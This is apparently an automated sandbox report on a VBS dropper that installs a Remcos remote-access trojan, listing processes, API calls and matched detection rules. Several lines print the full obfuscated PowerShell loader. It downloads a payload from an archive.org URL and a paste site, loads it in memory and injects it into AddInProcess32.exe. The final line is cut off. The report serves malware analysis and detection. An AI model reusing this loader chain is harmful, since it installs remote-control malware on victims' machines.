                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAAC6006445_2_00007FFAAC600644
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAAC5410B85_2_00007FFAAC5410B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043706A7_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004140057_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E11C7_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004541D97_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004381E87_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041F18B7_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004462707_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E34B7_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004533AB7_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0042742E7_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004375667_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043E5A87_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004387F07_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043797E7_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004339D77_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044DA497_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00427AD77_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041DBF37_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00427C407_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00437DB37_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00435EEB7_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043DEED7_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00426E9F7_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                    Source: asegurar.vbsInitial sample: Strings found which are bigger than 50
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@10/6@6/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RZH5WZ
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua33vol0.qv3.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJy